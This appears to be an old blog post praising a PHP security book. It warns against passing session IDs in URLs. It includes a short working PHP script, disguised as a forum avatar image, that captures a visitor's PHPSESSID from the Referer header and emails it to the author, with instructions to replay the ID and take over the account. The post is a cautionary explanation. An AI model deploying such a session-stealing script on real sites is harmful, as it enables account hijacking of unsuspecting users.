Just started reading Ilia Alshanetsky's new PHP Guide to Security book found over at
http://www.phparch.com and I must say this is a must have book for any serious php developers. The session security chapter alone is worth the price. Here is a little script I wrote which should point out why you should NEVER keep any personal information on a site that transmits their session IDS through the URL.
Lets say we're on a web forum together on site
www.xyz.com and I'm allowed to post a URL to an image in my avatar, well instead of
www.jimsite.com/myimage.jpg I make it
www.jimsite.com/fake_image.php
so the html would output
<img src="www.jimsite.com/fake_image.php">
If your URL string has the session ID passed in it like
www.xyz.com?PHPSESSID=593584jgjdl59 and you view the page that has my image.. guess what I can write:
<?php
$referrer = $_SERVER['HTTP_REFERER'];
// lets check to see if we got something juicy
if(strstr($referrer,
'PHPSESSID=')) { mail('jplush76@gmail.com',
'GOT A SESSION ID!',
$referrer);
}
header("Content-type: $type");
?>
-
so it looks like it still outputs my image however I just emailed myself your URL string if it contains the PHPSESSID which is the default Session ID name PHP uses. So once I get that email I can copy/paste into my browser and guess what, I'm now you. I can get into your account and do whatever I want and it was pretty darn easy.
be warned.. and get that book!
